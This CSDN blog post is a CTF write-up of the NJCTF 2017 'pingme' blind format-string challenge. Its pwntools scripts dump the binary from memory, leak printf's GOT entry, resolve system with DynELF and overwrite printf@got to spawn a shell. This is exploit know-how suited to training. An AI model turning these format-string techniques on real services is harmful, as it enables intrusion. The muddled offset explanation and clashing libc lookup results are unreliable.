Pwn·fmt学习笔记

于 2024-05-26 20:38:56 发布
阅读量804 收藏 18
点赞数 30
文章标签: 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22607673/article/details/139218153
版权

0x1 前言

fmt可以泄漏任意地址内容以及对地址进行写入,fmt漏洞一旦存在,则用处颇大,笔者近期复现了NJCTF 2017的pingme题目,在此做学习笔记。

0x2 题目获取

题目复现
执行./run.sh即可

0x3 解题过程

这是一道blind fmt,没有下发elf和libc,因此需要先与靶机交互获得一些信息。
尝试输入

 nc 127.0.0.1 10001Ping meABCD%7$xABCD44434241

回显地址,很明显是格式字符串,按照常理,需要对参数位置进行枚举

def exec_fmt(payload):
   p.sendline(payload)
   info = p.recv()
   return info
auto = FmtStr(exec_fmt)
offset = auto.offset
success(f"offset is {offset}")

发现参数是7
然后可以利用fmt来dump内存获得elf文件

dumpfile

这是一个32位的程序

在没有开启 PIE 的情况下,32 位程序从地址 0x8048000 开始,0x1000 的大小就足够了。在对内存 \x00 进行 leak 时,数据长度为零,直接给它赋值就可以了。

利用fmt将内存中的可执行文件dump下来

def dump_memory(start_addr, end_addr):
    result = b""  # 使用字节类型
    while start_addr < end_addr:
        p = remote('127.0.0.1', 10001)
        p.recvline()
        #print result.encode('hex')
        payload = b"%9$s.AAA" + p32(start_addr)
        p.sendline(payload)
        data = p.recvuntil(b".AAA")[:-4]  # 修改为字节类型
        if data == b"":  # 修改为字节类型
            data = b"\x00"
        log.info(f"leaking {start_addr},{data}")
        result += data
        start_addr += len(data)
        p.close()
    return result

start_addr = 0x8048000
end_addr = 0x8049000
code_bin = dump_memory(start_addr, end_addr)

with open("code.bin", "wb") as f:
    f.write(code_bin)
    f.close()

在格式化字符串攻击中,偏移量是用来定位参数在堆栈中的位置的。根据你的描述,ABCD%7$x 表示 ABCD 在第 7 个参数的位置。然而,在你的 dump_memory 函数中,构造的 payload 变成了 "%9$s.AAA" + p32(start_addr),这意味着你要打印的内容 %9$s 被指定为第 9 个参数。

之所以从 7 改为 9,是因为在新的 payload 中,实际传递给 printf 的参数比原先更多。具体原因如下:

  1. 基础格式化字符串
    • %9$s.AAA 中的 %9$s 是格式化字符串,它指向第 9 个参数。
  2. 增加的地址参数
    • p32(start_addr) 是附加到格式化字符串之后的实际地址,这个地址在堆栈中也是一个参数。

当你构造 payload "%9$s.AAA" + p32(start_addr) 时, p32(start_addr) 将地址放在堆栈中一个额外的位置。因此,原来位于第 7 个参数的位置变成了第 9 个参数。

示例分析

假设原来的堆栈情况是这样的:

  1. ABCD
  2. 参数1
  3. 参数2
  4. 参数3
  5. 参数4
  6. 参数5
  7. 参数6

%7$s 表示取第 7 个参数。

当你加入 p32(start_addr) 后,堆栈情况变成:

  1. ABCD
  2. 参数1
  3. 参数2
  4. 参数3
  5. 参数4
  6. 参数5
  7. 参数6
  8. start_addr # 这是 p32(start_addr) 加入后的新参数位置

现在 start_addr 实际上是第 9 个参数,所以你需要用 %9$s 来引用它。

在这里插入图片描述

确认新的偏移

为了确认新的偏移,我们使用了 FmtStr(exec_fmt) 来自动探测新的偏移量,并发现偏移量是 9。这一步是关键,因为不同的程序可能由于参数传递的变化,导致偏移量有所不同。

拿到libc

利用printf的got泄露

def get_printf_addr():
    p.recvline()
    gdb.attach(p)
    payload = b"%9$s.AAA" + p32(printf_got)
    p.sendline(payload)
    data = u32(p.recvuntil(".AAA")[:4])
    
    log.info("printf address: 0x%x" % data)
    return data

get_printf_addr()


$ ./find printf 670
ubuntu-xenial-i386-libc6 (id libc6_2.23-0ubuntu9_i386)
/usr/lib32/libc-2.26.so (id local-292a64d65098446389a47cdacdf5781255a95098)
$ ./dump local-292a64d65098446389a47cdacdf5781255a95098 printf system
offset_printf = 0x00051670
offset_system = 0x0003cc50

在这里插入图片描述

然后弄system,可以看到,我们成功的泄露了printf的函数地址,然后我们利用这个libc-database中搜libc,拿到libc,就可以算出libc-base-addr然后拿到system

zephyr@zephyr-virtual-machine:/mnt/hgfs/CTF/train/pwn/CTF-All-In-One-master/src/writeup/6.1.2_pwn_njctf2017_pingme/libc-database$ ./find printf a90
ubuntu-glibc (libc6-amd64_2.31-0ubuntu9.15_i386)

DynELF

首先找到程序的入口地址

在这里插入图片描述

如图是 0x8048490

def leak(addr):
    p = remote('127.0.0.1', '10001')
    payload = b"%9$s.AAA" + p32(addr)
    p.sendlineafter(b"Ping me\n",payload)
    data = p.recvuntil(".AAA")[:-4] + b"\x00"
    log.info("leaking: 0x%x --> %s" % (addr, data.hex()))
    p.close()
    return data
data = DynELF(leak, 0x08048490)     # Entry point address
system_addr = data.lookup('system', 'libc')
printf_addr = data.lookup('printf', 'libc')
log.info("system address: 0x%x" % system_addr)
log.info("printf address: 0x%x" % printf_addr)

attack

将system的地址写到printf@got中,然后送 /bin/sh 这样就相当于执行了 system("/bin/sh"

利用 fmtstr_payload 构造payload

payload = fmtstr_payload(7,{printf_got:system_addr})

将printf的got改成system的地址,这样程序调用printf的时候,实际上调用的是system然后发送字符串 /bin/sh,就可以在调用 printf(“/bin/sh”) 的时候实际上调用 system(“/bin/sh”)。

西风三级#3
关注
  • 30
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF Blind pwn题型学习笔记
lifanxin的博客
08-31 1884
Blind pwn概述如何辨别漏洞类型逻辑漏洞盲打格式化字符串盲打原理阐述例题讲解axb_2019_fmt32栈溢出盲打堆盲打总结 概述   所谓Blind pwn,即是在无法获得二进制程序文件的情况下对题目进行漏洞利用。这篇博客主要是将见到过的盲打pwn题做一个总结,大概可以分为以下几类盲打pwn题:逻辑漏洞盲打、格式化字符串盲打、栈溢出盲打、堆盲打。 如何辨别漏洞类型   对于盲打题,首先第一步应该是判断属于哪种类型的盲打,判断的步骤也很简单,nc连上后,直接看程序提供的菜单功能。   一般来说,需要逻
[2020 GeekChallange] Pwn fmt
Nashi_Ko的博客
11-18 532
[2020 GeekChallange] fmt 0x00 格式化字符串漏洞 提示格式化字符串漏洞 简单介绍一下原理: 在写C语言时,不免经常使用printf函数,这个函数有一个很常见的用法: a = 24; printf("%d岁,是学生",a); 输出结果很显然是 24岁,是学生 但是如果出现这么个情况: a = "%p.%p.%p.%p." printf(a) 它就会输出栈的后4个地址。 a = "%4$p" printf(a) 单独输出第四个地址 a = "%4$s" printf(a)
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1131
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串。
Pwn 学习 fmt_test_2格式化字符串
MrTreebook的博客
08-21 281
Pwn 学习 fmt_test_2格式化字符串。
[BUUCTF]PWN——judgement_mna_2016(32位fmt
mcmuyanga的博客
03-18 437
judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的位置,算一下偏移就能够打印出flag 先找一下输入点参数在栈上的位置 可以看到在oxffffcf4c,然后看一下栈上的布局 发现在距离我们输入的数据的偏移为28和32处存放着flag,定位偏移到该处即可 这题根本不用写exp,但为了水长度,贴一下吧 from pwn import * conte
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 602
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
pwn入门学习-附件资源
03-05
pwn入门学习-附件资源
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指...对于想要学习嵌入式系统开发和硬件驱动编程的人来说,这是一个有价值的实践案例。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
[XYCTF新生赛]-PWN:fmt解析(scanf格式化字符串漏洞,任意地址写)
最新发布
2301_79326813的博客
05-03 208
查看保护查看ida这里没什么好说的。
64位格式化字符串漏洞pwn入门
z2876563的博客
08-10 1763
CTF竞赛权威指南PWN篇第166页参考程序 如下程序有格式化字符串漏洞,原文是编译成32位程序,为了增加难度,我编译成64位程序。以下我通过漏洞实现输入arg4的地址获取arg4的内容即ABCD。 //fmtdemo.c -o #include<stdio.h> void main() { char format[128]; int arg1 =1,arg2=0x88888882,arg3=-1; char arg4[10]="ABCD"; scanf("%s
Pwn】2019安洵杯线上赛 fmt32 && fmt64
Nothing
12-01 1019
出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。 1.fmt32 只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。...
pwn 网鼎杯 easyFMT
SsMing的博客
09-01 1971
作为一个菜狗子只能等大佬的writeup学习   才会做 easyFMT看名字就是到是格式化串洞,然后就是要确定存在格式化串洞的参数是第几个 确定为是print的第六个参数 大佬计算参数的脚本是: #!/usr/bin/python from pwn import * elf = ELF('./pwn') for i in xrange(1,100): p = proce...
Pwn题中修改程序连接库的方法
Nothing
11-28 1730
Pwn的时候有时候会遇到题目的环境和本地环境不一致的情况。如果要装和远程环境相同的虚拟机就会比较麻烦,下面可以通过修改binary动态连接库的方法,强行让程序链接到与远程环境相同的库上。 1.首先下载好和远程环境相同的动态库,如libc-2.23.so;然后下载与之相符的链接器ld-2.23.so。有两个项目可以实现自动下载 libc:https://github.com/niklasb/lib...
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 4844
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
某道Pwn(格式化字符串漏洞)
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
学习pwn需要学习哪些数学知识
05-18
学习 pwn 通常需要掌握以下数学知识: 1. 二进制和十六进制:pwn 题目通常会给出二进制或十六进制的数据,因此需要熟悉这两种进制的转换和计算。 2. 离散数学:离散数学是计算机科学中的一门重要课程,它涉及到许多 pwn 中用到的算法和数据结构,例如哈希表、图论、组合数学等。 3. 模运算:在 pwn 中,模运算经常被用来处理加密算法或者防止整数溢出等问题。 4. 基础数论:pwn 题目中经常涉及到素数、欧拉函数、费马小定理等基础数论概念,因此需要对这些内容有一定的了解。 5. 线性代数:在 pwn 中,矩阵运算和向量运算经常被用来解决密码学和加密算法相关的问题,因此需要对线性代数有一定的了解。 当然,不同的 pwn 题目可能需要的数学知识也会有所不同,但以上几个方面是比较基础和常见的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值